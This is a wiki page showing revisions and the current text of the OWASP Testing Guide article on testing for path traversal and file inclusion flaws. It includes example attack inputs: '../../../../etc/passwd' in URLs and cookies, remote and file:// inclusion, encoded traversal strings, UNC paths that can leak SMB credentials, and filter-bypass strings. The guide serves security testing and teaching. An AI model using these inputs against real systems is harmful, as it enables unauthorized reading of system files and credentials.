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Difference between revisions of "Testing Directory traversal/file include (OTG-AUTHZ-001)"
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− | {{Template:OWASP Testing Guide | + | {{Template:OWASP Testing Guide v4}} |
− | == | + | == Summary == |
− | Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read | + | Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not intended to be accessible. In particular situations, it could be possible to execute arbitrary code or system commands. |
− | |||
− | |||
− | |||
− | |||
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− | + | Traditionally, web servers and web applications implement authentication mechanisms to control access to files and resources. Web servers try to confine users' files inside a "root directory" or "web document root", which represents a physical directory on the file system. Users have to consider this directory as the base directory into the hierarchical structure of the web application. | |
− | + | The definition of the privileges is made using Access Control Lists (ACL) which identify which users or groups are supposed to be able to access, modify, or execute a specific file on the server. These mechanisms are designed to prevent malicious users from accessing sensitive files (for example, the common /etc/passwd file on a UNIX-like platform) or to avoid the execution of system commands. | |
− | + | Many web applications use server-side scripts to include different kinds of files. It is quite common to use this method to manage images, templates, load static texts, and so on. Unfortunately, these applications expose security vulnerabilities if input parameters (i.e., form parameters, cookie values) are not correctly validated. | |
− | + | In web servers and web applications, this kind of problem arises in path traversal/file include attacks. By exploiting this kind of vulnerability, an attacker is able to read directories or files which they normally couldn't read, access data outside the web document root, or include scripts and other kinds of files from external websites. | |
− | + | For the purpose of the OWASP Testing Guide, only the security threats related to web applications will be considered and not threats to web servers (e.g., the infamous "%5c escape code" into Microsoft IIS web server). Further reading suggestions will be provided in the references section for interested readers. | |
− | + | This kind of attack is also known as the dot-dot-slash attack (../), directory traversal, directory climbing, or backtracking. | |
− | + | During an assessment, to discover path traversal and file include flaws, testers need to perform two different stages: | |
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− | During an assessment, | ||
* ('''a''') '''Input Vectors Enumeration''' (a systematic evaluation of each input vector) | * ('''a''') '''Input Vectors Enumeration''' (a systematic evaluation of each input vector) | ||
* ('''b''') '''Testing Techniques''' (a methodical evaluation of each attack technique used by an attacker to exploit the vulnerability) | * ('''b''') '''Testing Techniques''' (a methodical evaluation of each attack technique used by an attacker to exploit the vulnerability) | ||
<br> | <br> | ||
− | == Black Box testing | + | ==How to Test== |
− | + | === Black Box testing === | |
− | In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application | + | ====Input Vectors Enumeration==== |
+ | In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. This also includes HTTP GET and POST queries and common options like file uploads and HTML forms. | ||
+ | |||
Here are some examples of the checks to be performed at this stage: | Here are some examples of the checks to be performed at this stage: | ||
Line 49: | Line 32: | ||
* Are there unusual file extensions? | * Are there unusual file extensions? | ||
* Are there interesting variable names? | * Are there interesting variable names? | ||
+ | |||
<pre> | <pre> | ||
http://example.com/getUserProfile.jsp?item=ikki.html | http://example.com/getUserProfile.jsp?item=ikki.html | ||
Line 55: | Line 39: | ||
</pre> | </pre> | ||
− | * Is it possible to identify cookies used by the web application for the dynamic generation of pages | + | * Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates? |
<pre> | <pre> | ||
Line 63: | Line 47: | ||
<br> | <br> | ||
− | |||
− | The next stage of testing is analyzing the input validation functions present in the web application. | + | ====Testing Techniques==== |
+ | |||
+ | The next stage of testing is analyzing the input validation functions present in the web application. Using the previous example, the dynamic page called ''getUserProfile.jsp'' loads static information from a file and shows the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/UNIX system. Obviously, this kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file. | ||
− | |||
− | |||
To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server. | To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server. | ||
Line 76: | Line 59: | ||
</pre> | </pre> | ||
− | For the cookies example | + | |
+ | For the cookies example: | ||
<pre> | <pre> | ||
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd | Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd | ||
</pre> | </pre> | ||
+ | |||
It's also possible to include files and scripts located on external website. | It's also possible to include files and scripts located on external website. | ||
Line 86: | Line 71: | ||
</pre> | </pre> | ||
− | The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal | + | |
+ | If protocols are accepted as arguments, as in the above example, it's also possible to probe the local filesystem this way. | ||
+ | <pre> | ||
+ | http://example.com/index.php?file=file:///etc/passwd | ||
+ | </pre> | ||
+ | |||
+ | If protocols are accepted as arguments, as in the above examples, it's also possible to probe the local services and nearby services. | ||
+ | <pre> | ||
+ | http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080 | ||
+ | </pre> | ||
+ | |||
+ | |||
+ | The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal characters. | ||
+ | |||
<pre> | <pre> | ||
http://example.com/main.cgi?home=main.cgi | http://example.com/main.cgi?home=main.cgi | ||
Line 95: | Line 93: | ||
<b>Tip</b> | <b>Tip</b> | ||
− | It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first | + | It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first the test string isn't successful, try another encoding scheme. |
− | Each operating system uses different | + | |
+ | Each operating system uses different characters as path separator: | ||
''Unix-like OS'': | ''Unix-like OS'': | ||
Line 117: | Line 116: | ||
</pre> | </pre> | ||
<br> | <br> | ||
− | We should take in account the following | + | |
+ | We should take in to account the following character encoding mechanisms: | ||
* URL encoding and double URL encoding | * URL encoding and double URL encoding | ||
Line 142: | Line 142: | ||
There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths. | There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths. | ||
− | ''Windows shell'' | + | * ''Windows shell'': Appending any of the following to paths used in a shell command results in no difference in function: |
+ | ** Angle brackets ">" and "<" at the end of the path | ||
+ | ** Double quotes (closed properly) at the end of the path | ||
+ | ** Extraneous current directory markers such as "./" or ".\" | ||
+ | ** Extraneous parent directory markers with arbitrary items that may or may not exist | ||
+ | *: Examples:<br> | ||
+ | |||
<pre> | <pre> | ||
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– file.txt | – file.txt | ||
– file.txt... | – file.txt... | ||
Line 162: | Line 159: | ||
</pre> | </pre> | ||
− | ''Windows API'' | + | |
+ | * ''Windows API'': The following items are discarded when used in any shell command or API call where a string is taken as a filename:<br> | ||
<pre> | <pre> | ||
− | |||
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periods | periods | ||
spaces | spaces | ||
</pre> | </pre> | ||
− | ''Windows UNC Filepaths'' | + | |
+ | * ''Windows UNC Filepaths'': Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.<br> | ||
<pre> | <pre> | ||
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\\server_or_ip\path\to\file.abc | \\server_or_ip\path\to\file.abc | ||
\\?\server_or_ip\path\to\file.abc | \\?\server_or_ip\path\to\file.abc | ||
</pre> | </pre> | ||
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− | == Gray Box testing | + | * ''Windows NT Device Namespace'': Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path. |
− | When the analysis is performed with a Gray Box approach, | + | ** May be equivalent to a drive letter such as c:\, or even a drive volume without an assigned letter.<br><pre>\\.\GLOBALROOT\Device\HarddiskVolume1\</pre> |
− | During a source code review, | + | ** Refers to the first disc drive on the machine.<br><pre>\\.\CdRom0\</pre> |
+ | |||
+ | === Gray Box testing === | ||
+ | When the analysis is performed with a Gray Box approach, testers have to follow the same methodology as in Black Box Testing. However, since they can review the source code, it is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately. During a source code review, they can use simple tools (such as the ''grep'' command) to search for one or more common patterns within the application code: inclusion functions/methods, filesystem operations, and so on. | ||
<pre> | <pre> | ||
Line 201: | Line 187: | ||
</pre> | </pre> | ||
− | |||
− | For PHP, | + | Using online code search engines (e.g., Ohloh Code[http://code.ohloh.net/]), it may also be possible to find path traversal flaws in Open Source software published on the Internet. |
+ | |||
+ | For PHP, testers can use: | ||
<pre> | <pre> | ||
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE) | lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE) | ||
</pre> | </pre> | ||
<br> | <br> | ||
+ | |||
Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment. | Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment. | ||
− | |||
− | Additionally, reviewing the source code | + | Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible to insert specially crafted path traversal strings when the application adds data to the database. This kind of security problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and "safe" but are not in reality. |
+ | |||
+ | |||
+ | Additionally, by reviewing the source code it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws. | ||
+ | |||
Consider a web application with these instructions: | Consider a web application with these instructions: | ||
Line 228: | Line 219: | ||
</pre> | </pre> | ||
<br> | <br> | ||
+ | |||
+ | |||
+ | ==Tools== | ||
+ | * DotDotPwn - The Directory Traversal Fuzzer - http://dotdotpwn.sectester.net | ||
+ | * Path Traversal Fuzz Strings (from WFuzz Tool) - http://code.google.com/p/wfuzz/source/browse/trunk/wordlist/Injections/Traversal.txt | ||
+ | * Web Proxy (''Burp Suite''[http://portswigger.net], ''Paros''[http://www.parosproxy.org/index.shtml], ''WebScarab''[http://www.owasp.org/index.php/OWASP_WebScarab_Project],''OWASP: Zed Attack Proxy (ZAP)''[https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project]) | ||
+ | * Enconding/Decoding tools | ||
+ | * String searcher "grep" - http://www.gnu.org/software/grep/ | ||
+ | * DirBuster - https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project | ||
+ | * OWASP ZAP - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project | ||
== References == | == References == | ||
'''Whitepapers''' | '''Whitepapers''' | ||
− | + | * phpBB Attachment Mod Directory Traversal HTTP POST Injection - http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html] | |
− | * phpBB Attachment Mod Directory Traversal HTTP POST Injection - | ||
− | http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html] | ||
* Windows File Pseudonyms: Pwnage and Poetry - http://www.slideshare.net/BaronZor/windows-file-pseudonyms[http://www.slideshare.net/BaronZor/windows-file-pseudonyms] | * Windows File Pseudonyms: Pwnage and Poetry - http://www.slideshare.net/BaronZor/windows-file-pseudonyms[http://www.slideshare.net/BaronZor/windows-file-pseudonyms] | ||
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<br> | <br> |
Latest revision as of 01:25, 2 April 2016
This article is part of the new OWASP Testing Guide v4.
Back to the OWASP Testing Guide v4 ToC: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents Back to the OWASP Testing Guide Project: https://www.owasp.org/index.php/OWASP_Testing_Project
Summary
Many web applications use and manage files as part of their daily operation. Using input validation methods that have not been well designed or deployed, an aggressor could exploit the system in order to read or write files that are not intended to be accessible. In particular situations, it could be possible to execute arbitrary code or system commands.
Traditionally, web servers and web applications implement authentication mechanisms to control access to files and resources. Web servers try to confine users' files inside a "root directory" or "web document root", which represents a physical directory on the file system. Users have to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using Access Control Lists (ACL) which identify which users or groups are supposed to be able to access, modify, or execute a specific file on the server. These mechanisms are designed to prevent malicious users from accessing sensitive files (for example, the common /etc/passwd file on a UNIX-like platform) or to avoid the execution of system commands.
Many web applications use server-side scripts to include different kinds of files. It is quite common to use this method to manage images, templates, load static texts, and so on. Unfortunately, these applications expose security vulnerabilities if input parameters (i.e., form parameters, cookie values) are not correctly validated.
In web servers and web applications, this kind of problem arises in path traversal/file include attacks. By exploiting this kind of vulnerability, an attacker is able to read directories or files which they normally couldn't read, access data outside the web document root, or include scripts and other kinds of files from external websites.
For the purpose of the OWASP Testing Guide, only the security threats related to web applications will be considered and not threats to web servers (e.g., the infamous "%5c escape code" into Microsoft IIS web server). Further reading suggestions will be provided in the references section for interested readers.
This kind of attack is also known as the dot-dot-slash attack (../), directory traversal, directory climbing, or backtracking.
During an assessment, to discover path traversal and file include flaws, testers need to perform two different stages:
- (a) Input Vectors Enumeration (a systematic evaluation of each input vector)
- (b) Testing Techniques (a methodical evaluation of each attack technique used by an attacker to exploit the vulnerability)
How to Test
Black Box testing
Input Vectors Enumeration
In order to determine which part of the application is vulnerable to input validation bypassing, the tester needs to enumerate all parts of the application that accept content from the user. This also includes HTTP GET and POST queries and common options like file uploads and HTML forms.
Here are some examples of the checks to be performed at this stage:
- Are there request parameters which could be used for file-related operations?
- Are there unusual file extensions?
- Are there interesting variable names?
http://example.com/getUserProfile.jsp?item=ikki.html http://example.com/index.php?file=content http://example.com/main.cgi?home=index.htm
- Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
Testing Techniques
The next stage of testing is analyzing the input validation functions present in the web application. Using the previous example, the dynamic page called getUserProfile.jsp loads static information from a file and shows the content to users. An attacker could insert the malicious string "../../../../etc/passwd" to include the password hash file of a Linux/UNIX system. Obviously, this kind of attack is possible only if the validation checkpoint fails; according to the file system privileges, the web application itself must be able to read the file.
To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. There is no point requesting /etc/passwd from an IIS web server.
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
For the cookies example:
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
It's also possible to include files and scripts located on external website.
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
If protocols are accepted as arguments, as in the above example, it's also possible to probe the local filesystem this way.
http://example.com/index.php?file=file:///etc/passwd
If protocols are accepted as arguments, as in the above examples, it's also possible to probe the local services and nearby services.
http://example.com/index.php?file=http://localhost:8080 or http://example.com/index.php?file=http://192.168.0.2:9080
The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal characters.
http://example.com/main.cgi?home=main.cgi
The component called "main.cgi" is located in the same directory as the normal HTML static files used by the application. In some cases the tester needs to encode the requests using special characters (like the "." dot, "%00" null, ...) in order to bypass file extension controls or to prevent script execution.
Tip It's a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first the test string isn't successful, try another encoding scheme.
Each operating system uses different characters as path separator:
Unix-like OS:
root directory: "/" directory separator: "/"
Windows OS' Shell':
root directory: "<drive letter>:\" directory separator: "\" or "/"
Classic Mac OS:
root directory: "<drive letter>:" directory separator: ":"
We should take in to account the following character encoding mechanisms:
- URL encoding and double URL encoding
%2e%2e%2f represents ../ %2e%2e/ represents ../ ..%2f represents ../ %2e%2e%5c represents ..\ %2e%2e\ represents ..\ ..%5c represents ..\ %252e%252e%255c represents ..\ ..%255c represents ..\ and so on.
- Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
..%c0%af represents ../ ..%c1%9c represents ..\
There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths.
- Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
- Angle brackets ">" and "<" at the end of the path
- Double quotes (closed properly) at the end of the path
- Extraneous current directory markers such as "./" or ".\"
- Extraneous parent directory markers with arbitrary items that may or may not exist
- Examples:
– file.txt – file.txt... – file.txt<spaces> – file.txt”””” – file.txt<<<>>>< – ./././file.txt – nonexistant/../file.txt
- Windows API: The following items are discarded when used in any shell command or API call where a string is taken as a filename:
periods spaces
- Windows UNC Filepaths: Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.
\\server_or_ip\path\to\file.abc \\?\server_or_ip\path\to\file.abc
- Windows NT Device Namespace: Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path.
- May be equivalent to a drive letter such as c:\, or even a drive volume without an assigned letter.
\\.\GLOBALROOT\Device\HarddiskVolume1\
- Refers to the first disc drive on the machine.
\\.\CdRom0\
- May be equivalent to a drive letter such as c:\, or even a drive volume without an assigned letter.
Gray Box testing
When the analysis is performed with a Gray Box approach, testers have to follow the same methodology as in Black Box Testing. However, since they can review the source code, it is possible to search the input vectors (stage (a) of the testing) more easily and accurately. During a source code review, they can use simple tools (such as the grep command) to search for one or more common patterns within the application code: inclusion functions/methods, filesystem operations, and so on.
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ... JSP/Servlet: java.io.File(), java.io.FileReader(), ... ASP: include file, include virtual, ...
Using online code search engines (e.g., Ohloh Code[1]), it may also be possible to find path traversal flaws in Open Source software published on the Internet.
For PHP, testers can use:
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
Using the Gray Box Testing method, it is possible to discover vulnerabilities that are usually harder to discover, or even impossible to find during a standard Black Box assessment.
Some web applications generate dynamic pages using values and parameters stored in a database. It may be possible to insert specially crafted path traversal strings when the application adds data to the database. This kind of security problem is difficult to discover due to the fact the parameters inside the inclusion functions seem internal and "safe" but are not in reality.
Additionally, by reviewing the source code it is possible to analyze the functions that are supposed to handle invalid input: some developers try to change invalid input to make it valid, avoiding warnings and errors. These functions are usually prone to security flaws.
Consider a web application with these instructions:
filename = Request.QueryString(“file”); Replace(filename, “/”,”\”); Replace(filename, “..\”,””);
Testing for the flaw is achieved by:
file=....//....//boot.ini file=....\\....\\boot.ini file= ..\..\boot.ini
Tools
- DotDotPwn - The Directory Traversal Fuzzer - http://dotdotpwn.sectester.net
- Path Traversal Fuzz Strings (from WFuzz Tool) - http://code.google.com/p/wfuzz/source/browse/trunk/wordlist/Injections/Traversal.txt
- Web Proxy (Burp Suite[2], Paros[3], WebScarab[4],OWASP: Zed Attack Proxy (ZAP)[5])
- Enconding/Decoding tools
- String searcher "grep" - http://www.gnu.org/software/grep/
- DirBuster - https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
- OWASP ZAP - https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
References
Whitepapers
- phpBB Attachment Mod Directory Traversal HTTP POST Injection - http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0290.html[6]
- Windows File Pseudonyms: Pwnage and Poetry - http://www.slideshare.net/BaronZor/windows-file-pseudonyms[7]